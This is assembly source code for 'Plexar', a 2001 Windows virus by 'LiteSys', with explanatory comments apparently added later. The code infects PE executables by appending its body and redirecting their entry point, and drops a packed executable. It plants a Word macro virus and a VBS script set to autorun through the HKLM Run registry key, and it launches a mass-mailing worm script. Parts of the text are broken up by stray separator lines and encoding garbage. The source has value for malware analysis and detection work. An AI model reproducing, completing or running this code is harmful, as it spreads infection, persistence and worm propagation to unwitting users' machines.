        OR DWORD PTR [ESI+24h], 0A0000020h   ; Characteristics |= CNT_CODE | MEM_EXECUTE | MEM_WRITE (the body patches its own immediates)

        MOV EAX, DWORD PTR [ESI+08h]    ; VirtualSize
        PUSH EAX                        ; the old value fixes where the body starts
        ADD EAX, Virus_Tama<EFBFBD>o + 400h
        MOV DWORD PTR [ESI+08h], EAX    ; new VirtualSize

        MOV EBX, DWORD PTR [EDI+3Ch]    ; FileAlignment
        XOR EDX, EDX
        DIV EBX
        INC EAX
        MUL EBX                         ; round up to the next FileAlignment multiple (one extra unit when already aligned)

        MOV DWORD PTR [ESI+10h], EAX    ; SizeOfRawData

        MOV EAX, DWORD PTR [ESI+10h]
        ADD EAX, DWORD PTR [ESI+0Ch]    ; + VirtualAddress
        MOV DWORD PTR [EDI+50h], EAX    ; SizeOfImage (not rounded to SectionAlignment)

        POP EDX                         ; EDX = old VirtualSize

        MOV EAX, DWORD PTR [EDI+28h]    ; AddressOfEntryPoint
        ADD EAX, DWORD PTR [EDI+34h]    ; + ImageBase
        MOV DWO [HostBack], EAX         ; victim's original entry VA, carried in the body's PUSH/RET stub

        ADD EDX, DWORD PTR [ESI+0Ch]    ; new entry RVA = section VA + old VirtualSize
        MOV DWORD PTR [EDI+28h], EDX

        ; Eight single-byte opcodes (55 53 44 5B 4C 53 58 5D) whose bytes
        ; read "USD[LSX]": an executable author tag.  Net effect: EBP is
        ; restored; EBX and EAX end up holding bytes read through the
        ; shifted stack pointer, and neither is used by the visible code
        ; before the call to PXPE.
        PUSH EBP
        PUSH EBX
        INC ESP

        POP EBX ; \
        DEC ESP ; \
        PUSH EBX ; > "[LSX]" executable string.
        POP EAX ; /
        POP EBP ; /

        MOV EDI, DWORD PTR [ESI+14h]    ; PointerToRawData
        ADD EDI, DWORD PTR [ESI+08h]    ; + new VirtualSize
        ADD EDI, DWO [BaseMap]
        MOV ECX, Virus_Tama<EFBFBD>o / 4     ; body length in dwords
        SUB EDI, Virus_Tama<EFBFBD>o + 400h ; EDI = raw position of the old VirtualSize end: the body goes here
        LEA ESI, OFS [Empieza_Plexar]   ; body start, HostBack already patched
        CALL PXPE                       ; not in view; presumably the engine that writes the (polymorphic) body from ESI to EDI

        PUSH DWO [Tama<EFBFBD>o_2]
        POP DWO [Tama<EFBFBD>o_1]          ; infected: keep the grown length

@PE_UnMap:

        XOR EAX, EAX
        PUSH EAX                        ; FILE_BEGIN
        PUSH EAX                        ; lpDistanceToMoveHigh
        PUSH DWO [Tama<EFBFBD>o_1]          ; original length (skipped) or grown length (infected)
        PUSH DWO [FHandle]
        APICALL SetFilePointer

        PUSH DWO [FHandle]
        APICALL SetEndOfFile            ; the mapping grew the file; cut it back or keep the growth

        PUSH DWO [BaseMap]
        APICALL UnmapViewOfFile

@PE_CloseMap:

        PUSH DWO [MHandle]
        APICALL CloseHandle

@PE_Close:

        PUSH DWO [FHandle]
        APICALL CloseHandle

@PEF:

        XOR ECX, ECX
        POP DWORD PTR FS:[ECX]          ; unlink the SEH frame
        POP ECX

        PUSH DWO [Guarda_EIP]
        POP DWO [HostBack]              ; restore our own host's entry point

        POPAD
        RET

Infecta_PE ENDP

; ----------------------------------------------------------------------------

; This routine drops an empty PE file to disk.
;
; EBX -> name

; Droppear_PE: write the compressed PE image Dropper (content not in view)
; to disk as a plain, not yet infected file; Infecta_Word calls
; Infecta_PE on the same name right afterwards.
; In:  EBX -> file name.  Uses the EBP delta.  Registers preserved.
; Out: CF = 1 when the file could not be created; on every other path CF
;      is whatever the last API call left (the caller tests JC).
; Creates/overwrites the file (CREATE_ALWAYS), maps 32 KB of it,
; decompresses Dropper into the view with _aP_depack_asm (apparently
; aPLib's depacker, not in view: cdecl, dst/src, unpacked length returned
; in EAX), then truncates the file to that length.
Droppear_PE PROC
        PUSHAD

        XOR EAX, EAX
        PUSH EAX                        ; hTemplateFile
        PUSH FILE_ATTRIBUTE_NORMAL
        PUSH CREATE_ALWAYS
        PUSH EAX                        ; lpSecurityAttributes
        PUSH EAX                        ; dwShareMode
        PUSH GENERIC_READ + GENERIC_WRITE
        PUSH EBX
        APICALL CreateFileA
        MOV DWO [FHandle_DPE], EAX
        INC EAX
        JZ @Fin_DPE                     ; INVALID_HANDLE_VALUE: return with CF set
        DEC EAX

        XOR EBX, EBX
        PUSH EBX                        ; lpName
        PUSH 32768d                     ; dwMaximumSizeLow: the file grows to 32 KB
        PUSH EBX                        ; dwMaximumSizeHigh
        PUSH PAGE_READWRITE
        PUSH EBX                        ; lpAttributes
        PUSH EAX
        APICALL CreateFileMappingA
        MOV DWO [MHandle_DPE], EAX
        OR EAX, EAX
        JZ @DPE_Cierra

        XOR EBX, EBX
        PUSH 32768d                     ; dwNumberOfBytesToMap
        PUSH EBX                        ; dwFileOffsetLow
        PUSH EBX                        ; dwFileOffsetHigh
        PUSH FILE_MAP_WRITE
        PUSH EAX
        APICALL MapViewOfFile
        MOV DWO [BaseMap_DPE], EAX
        OR EAX, EAX
        JZ @DPE_CierraMap

        PUSH EAX                        ; destination = the mapped view
        LEA EAX, OFS [Dropper]          ; source = packed image
        PUSH EAX
        CALL _aP_depack_asm
        ADD ESP, 08h                    ; cdecl: caller removes the two arguments

        XOR EBX, EBX
        PUSH EBX                        ; FILE_BEGIN
        PUSH EBX                        ; lpDistanceToMoveHigh
        PUSH EAX                        ; unpacked length
        PUSH DWO [FHandle_DPE]
        APICALL SetFilePointer          ; position for the SetEndOfFile below

@DPE_DesMapea:

        PUSH DWO [BaseMap_DPE]
        APICALL UnmapViewOfFile

@DPE_CierraMap:

        PUSH DWO [MHandle_DPE]
        APICALL CloseHandle

@DPE_Cierra:

        PUSH DWO [FHandle_DPE]
        APICALL SetEndOfFile            ; truncate to the unpacked length (or wherever the pointer is on the error paths)

        PUSH DWO [FHandle_DPE]
        APICALL CloseHandle

        POPAD
        RET

@Fin_DPE:

        POPAD
        STC                             ; signal failure to the caller
        RET

Droppear_PE ENDP
; Plaintext author strings embedded in the body between Droppear_PE and
; Infecta_Word, separated by double NULs ("Written by LiteSys",
; "Made in Venezuela").  Static-signature material.
        DB 00h, 00h
        DB "< Virus Plexar (c) Julio/Agosto 2001 - Escrito por LiteSys >"
        DB 00h, 00h
        DB "[ Hecho en Venezuela ]"
        DB 00h, 00h

; ----------------------------------------------------------------------------

; Routine to drop the Word macro virus.

Infecta_Word PROC Pascal DeltaOfs:DWORD
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV EBP, DeltaOfs
|
|||
|
|
|||
|
CALL @SEH_3
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]
|
|||
|
JMP @IW_Fin
|
|||
|
|
|||
|
@SEH_3:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [VFreeZ], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EAX
|
|||
|
APICALL GetWindowsDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH DWO [VFreeZ]
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH 12345678h
|
|||
|
ORG $-4
|
|||
|
VFreeZ DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
LEA EBX, OFS [WScript_Exe]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JNC @VBS_Fin
|
|||
|
|
|||
|
LEA EBX, OFS [Raxelp_$$$]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JC @IW_Fin
|
|||
|
|
|||
|
LEA EDI, OFS [Macaco]
|
|||
|
PUSH 08h
|
|||
|
POP ECX
|
|||
|
@IW2:
|
|||
|
PUSH 25d
|
|||
|
POP EBX
|
|||
|
CALL Random
|
|||
|
ADD EAX, 65d
|
|||
|
STOSB
|
|||
|
LOOP @IW2
|
|||
|
|
|||
|
MOV EAX, "$$$."
|
|||
|
STOSD
|
|||
|
XOR AL, AL
|
|||
|
STOSB
|
|||
|
|
|||
|
LEA EBX, OFS [Macaco]
|
|||
|
CALL Droppear_PE
|
|||
|
JC @IW_Fin
|
|||
|
|
|||
|
LEA EBX, OFS [Macaco]
|
|||
|
CALL Infecta_PE
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH OPEN_EXISTING
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Macaco]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
PUSH EAX
|
|||
|
APICALL GetFileSize
|
|||
|
MOV DWO [Tama<EFBFBD>o_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraMap
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD EAX, 1000h
|
|||
|
PUSH EAX
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [Memoria_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
MOV ECX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
MOV EDI, EAX
|
|||
|
MOV ESI, DWO [BaseMap_IW]
|
|||
|
|
|||
|
@Conve:
|
|||
|
|
|||
|
LODSB
|
|||
|
CALL @Hexa
|
|||
|
STOSW
|
|||
|
|
|||
|
LOOP @Conve
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
STOSD
|
|||
|
|
|||
|
PUSH DWO [BaseMap_IW]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_NEW
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Raxelp_$$$]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
DEC EAX
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH 131072d
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraMap
|
|||
|
|
|||
|
MOV EDI, EAX
|
|||
|
LEA ESI, OFS [Virus_Macro]
|
|||
|
PUSH L_Virus_Macro
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
MOV ESI, DWO [Memoria_IW]
|
|||
|
XOR EDX, EDX
|
|||
|
XOR EAX, EAX
|
|||
|
|
|||
|
@IW_B:
|
|||
|
|
|||
|
MOVSB
|
|||
|
INC EDX
|
|||
|
CMP EDX, 200d
|
|||
|
JNZ @IW_D
|
|||
|
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
MOV AX, 0A0Dh
|
|||
|
STOSW
|
|||
|
MOV EAX, "adoj"
|
|||
|
STOSD
|
|||
|
MOV EAX, 'j = '
|
|||
|
STOSD
|
|||
|
MOV EAX, " ado"
|
|||
|
STOSD
|
|||
|
MOV AX, " +"
|
|||
|
STOSW
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
|
|||
|
; joda = joda + "
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
XOR EDX, EDX
|
|||
|
|
|||
|
@IW_D:
|
|||
|
|
|||
|
CMP BYTE PTR [ESI], AL
|
|||
|
JNZ @IW_B
|
|||
|
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
MOV AX, 0A0Dh
|
|||
|
STOSW
|
|||
|
|
|||
|
LEA ESI, OFS [Virus_Macro_2]
|
|||
|
PUSH L_Virus_Macro_2
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
PUSH DWO [BaseMap_IW]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
SUB EDI, DWO [BaseMap_IW]
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EDI
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD EAX, 1000h
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [Memoria_IW]
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_ALWAYS
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_WRITE
|
|||
|
LEA EBX, OFS [Plxwrd_vbs]
|
|||
|
PUSH EBX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
LEA EDX, OFS [Scriptum]
|
|||
|
PUSH EDX
|
|||
|
PUSH Largo_MVBS
|
|||
|
LEA EDX, OFS [Macro_VBS]
|
|||
|
PUSH EDX
|
|||
|
PUSH EAX
|
|||
|
APICALL WriteFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
CALL @IW_Q
|
|||
|
DB "SHLWAPI.DLL", 00h
|
|||
|
@IW_Q: APICALL LoadLibraryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
CALL @IW_K
|
|||
|
DB "SHSetValueA", 00h
|
|||
|
@IW_K: PUSH EAX
|
|||
|
APICALL GetProcAddress
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH 11d
|
|||
|
LEA EBX, OFS [Plxwrd_vbs]
|
|||
|
PUSH EBX
|
|||
|
PUSH REG_SZ
|
|||
|
CALL @IW_L
|
|||
|
DB "Plexar", 00h
|
|||
|
@IW_L: CALL @IW_M
|
|||
|
DB "Software\Microsoft\Windows\CurrentVersion\Run", 00h
|
|||
|
@IW_M: PUSH HKEY_LOCAL_MACHINE
|
|||
|
CALL EAX
|
|||
|
|
|||
|
@IW_Fin:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
MOV DWO [GuardaEBP2], EBP
|
|||
|
POPAD
|
|||
|
|
|||
|
MOV EBX, 12345678h
|
|||
|
ORG $-4
|
|||
|
GuardaEBP2 DD 00000000h
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
CALL [EBX+ExitThread]
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
@IW_CierraMap:
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@IW_CierraFile:
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
JMP @IW_Fin
|
|||
|
|
|||
|
; @Hexa - converts one byte to its two-character ASCII hex representation.
; (Original comment: "Convierte un numero a su representacion ASCII en Hex.")
;
; In:   AL  = byte to convert
; Out:  AL  = character for the high nibble, AH = character for the low nibble
;       (the caller at @Conve stores AX with STOSW, so the high nibble is
;       written first)
; Uses: Tabla_Hex - 16-byte character table defined elsewhere in the file
; Preserves ECX and EDI (pushed/popped here); flags are clobbered.
; Note: each nibble is looked up by stepping EDI through the table one byte
;       per iteration of a CL-counted loop instead of indexing [Tabla_Hex+n].
|
|||
|
|
|||
|
@Hexa:
|
|||
|
|
|||
|
PUSH ECX
|
|||
|
PUSH EDI
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
MOV CL, AL                          ; CL = input byte
|
|||
|
PUSH ECX                            ; keep a copy for the low nibble
|
|||
|
SHR CL, 04h                         ; CL = high nibble (0..15)
|
|||
|
LEA EDI, OFS [Tabla_Hex]
|
|||
|
INC CL                              ; loop runs nibble+1 times, then backs up one
|
|||
|
|
|||
|
@@Y:
|
|||
|
INC EDI
|
|||
|
DEC CL
|
|||
|
JNZ @@Y
|
|||
|
|
|||
|
DEC EDI                             ; EDI = Tabla_Hex + high nibble
|
|||
|
MOV AL, BYTE PTR [EDI] ; fetch the table character for this nibble
|
|||
|
POP ECX                             ; CL = original byte again
|
|||
|
AND CL, 0Fh                         ; CL = low nibble
|
|||
|
LEA EDI, OFS [Tabla_Hex]
|
|||
|
INC CL
|
|||
|
|
|||
|
@@X:
|
|||
|
INC EDI
|
|||
|
DEC CL
|
|||
|
JNZ @@X
|
|||
|
|
|||
|
DEC EDI                             ; EDI = Tabla_Hex + low nibble
|
|||
|
MOV AH, BYTE PTR [EDI] ; fetch the table character for this nibble
|
|||
|
POP EDI
|
|||
|
POP ECX
|
|||
|
|
|||
|
RET 00h
|
|||
|
|
|||
|
Infecta_Word ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Worm_VBS - drops the e-mail propagation script and launches it.
;
; Runs as its own thread: the non-DEBUG exit path at @VBS_Fin ends in
; ExitThread rather than RET (the file header calls the virus multithreaded).
; In:  DeltaOfs (Pascal argument) = relocation delta; it is loaded into EBP
;      and every OFS [...] reference below is resolved through it.
; Steps, each visible in the code below:
;   1. installs an SEH frame whose handler unwinds straight to @VBS_Fin;
;   2. makes the Windows directory the current directory, so all bare file
;      names below (WScript_Exe, Raxelp_vbs, the dropped PE) live there;
;   3. requires WScript_Exe to exist and Raxelp_vbs NOT to exist - the
;      script file doubles as an "already done on this host" marker;
;   4. picks a name from the NUL-separated list Nombres_Varios, drops a PE
;      under that name (Droppear_PE) and then runs Infecta_PE on it;
;   5. writes Raxelp_vbs = Gusano_VBS + "<windir>\<name>" + Gusano_VBS2
;      through a 4096-byte file mapping and truncates it to the bytes written;
;   6. resolves SHELL32!ShellExecuteA at run time and launches the script.
; Droppear_PE, Infecta_PE, Random, CRC32, the Gusano_VBS* blobs and the
; string labels are defined elsewhere in the file. @Existe_Archivo follows
; this routine and reports CF=1 when the file named by EBX exists.
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV EBP, DeltaOfs                   ; EBP = relocation delta for OFS [...]
|
|||
|
|
|||
|
CALL @SEH_4                         ; pushes the address of the next line = SEH handler
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]         ; handler: [ESP+8] is the EstablisherFrame, i.e. ESP at frame install
|
|||
|
JMP @VBS_Fin                        ; ...so the frame is popped normally at @VBS_Fin
|
|||
|
|
|||
|
@SEH_4:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]             ; frame = { previous handler, handler (pushed by the CALL) }
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc                ; MAX_PATH scratch buffer for the Windows directory
|
|||
|
MOV DWO [VFreeX], EAX               ; stored straight into the PUSH immediate below (ORG $-4 trick)
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EAX
|
|||
|
APICALL GetWindowsDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH DWO [VFreeX]
|
|||
|
APICALL SetCurrentDirectoryA        ; from here on bare file names resolve inside the Windows directory
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_Fin
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT                   ; decommit only - the reservation itself is never released
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH 12345678h                      ; immediate is the variable VFreeX (code must be writable)
|
|||
|
ORG $-4
|
|||
|
VFreeX DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
LEA EBX, OFS [WScript_Exe]
|
|||
|
CALL @Existe_Archivo                ; CF=1 if the file exists
|
|||
|
JNC @VBS_Fin                        ; no script host in the Windows directory -> give up
|
|||
|
|
|||
|
LEA EBX, OFS [Raxelp_vbs]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JC @VBS_Fin                         ; script already dropped -> give up (infection marker)
|
|||
|
|
|||
|
PUSH 10d
|
|||
|
POP EBX                             ; Random(limit=10) -> EAX in 0..9 (assumed from the @Aleatorio contract)
|
|||
|
CALL Random
|
|||
|
XCHG ECX, EAX
|
|||
|
LEA EDI, OFS [Nombres_Varios]       ; NUL-separated name list
|
|||
|
INC ECX                             ; skip ECX+1 entries: entry 0 of the list is never selected
|
|||
|
@VBS1:
|
|||
|
XOR AL, AL
|
|||
|
SCASB                               ; advance past the next NUL
|
|||
|
JNZ @VBS1
|
|||
|
LOOP @VBS1
|
|||
|
|
|||
|
PUSH EDI                            ; EDI = start of the chosen name
|
|||
|
@VBS2:
|
|||
|
XOR AL, AL
|
|||
|
INC ECX                             ; ECX is 0 after the LOOP above; count bytes up to and including the NUL
|
|||
|
SCASB
|
|||
|
JNZ @VBS2
|
|||
|
DEC ECX                             ; ECX = name length without the NUL
|
|||
|
POP EDI
|
|||
|
|
|||
|
MOV BY [LargoVBS], CL               ; byte-sized length: names longer than 255 would be truncated
|
|||
|
MOV DWO [GuardaNom], EDI
|
|||
|
|
|||
|
MOV EBX, EDI
|
|||
|
CALL Droppear_PE                    ; drop a PE under the chosen name; CF=1 used as failure below
|
|||
|
JC @VBS_Fin
|
|||
|
|
|||
|
MOV EBX, DWO [GuardaNom]
|
|||
|
CALL Infecta_PE                     ; return value is not checked
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_NEW                     ; fails if the script already exists (second guard after @Existe_Archivo)
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Raxelp_vbs]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_WVBS], EAX
|
|||
|
INC EAX                             ; INVALID_HANDLE_VALUE (-1) -> 0
|
|||
|
JZ @VBS_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH 4096d                          ; mapping size = 4096: the script plus path must fit in one page
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileMappingA          ; grows the new (empty) file to 4096 bytes
|
|||
|
MOV DWO [MHandle_WVBS], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_WVBS], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_DesMapea
|
|||
|
|
|||
|
XCHG EDI, EAX                       ; EDI = write cursor inside the mapped view
|
|||
|
LEA ESI, OFS [Gusano_VBS]
|
|||
|
PUSH L_Gusano_VBS
|
|||
|
POP ECX
|
|||
|
REP MOVSB                           ; first half of the script template
|
|||
|
|
|||
|
PUSH EDI
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EDI
|
|||
|
APICALL GetWindowsDirectoryA        ; written in place, directly into the script text
|
|||
|
OR EAX, EAX
|
|||
|
JZ @VBS_CierraTodo                  ; note: the pushed EDI is left on the stack on this path
|
|||
|
POP EDI
|
|||
|
ADD EDI, EAX                        ; EAX = length of the directory string
|
|||
|
MOV BYTE PTR [EDI], "\"
|
|||
|
INC EDI
|
|||
|
|
|||
|
MOV ESI, DWO [GuardaNom]
|
|||
|
MOVZX ECX, BY [LargoVBS]
|
|||
|
REP MOVSB                           ; "<windir>\<dropped name>" is now embedded in the script
|
|||
|
|
|||
|
LEA ESI, OFS [Gusano_VBS2]
|
|||
|
PUSH L_Gusano_VBS2
|
|||
|
POP ECX
|
|||
|
REP MOVSB                           ; second half of the script template
|
|||
|
SUB EDI, DWO [BaseMap_WVBS]         ; EDI = bytes written
|
|||
|
|
|||
|
PUSH DWO [BaseMap_WVBS]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EDI
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetFilePointer              ; shrink the 4096-byte file back to the script length
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_WVBS]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
